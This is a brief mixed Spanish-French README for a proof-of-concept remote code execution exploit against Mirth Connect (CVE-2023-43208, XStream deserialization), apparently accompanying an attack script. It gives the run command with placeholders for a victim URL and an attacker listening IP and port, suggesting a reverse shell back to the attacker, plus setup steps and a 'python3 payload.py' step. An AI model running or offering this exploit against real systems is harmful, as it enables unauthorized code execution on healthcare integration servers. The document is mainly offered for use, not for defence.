
Explota vulnerabilidad
Ce script est une Preuve de Concept (PoC) pour la vulnérabilité d'Exécution de Code à Distance (RCE) dans Mirth Connect (versions antérieures à 4.4.1). Il exploite une vulnérabilité de désérialisation XStream via l'API.
python3 CVE-2023-43208.py -u [https://IP-victima] -lh [IP-atacante] -lp [puerto]
Il est recommandé d'utiliser un environnement virtuel :
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
#Exécution du payload
python3 payload.py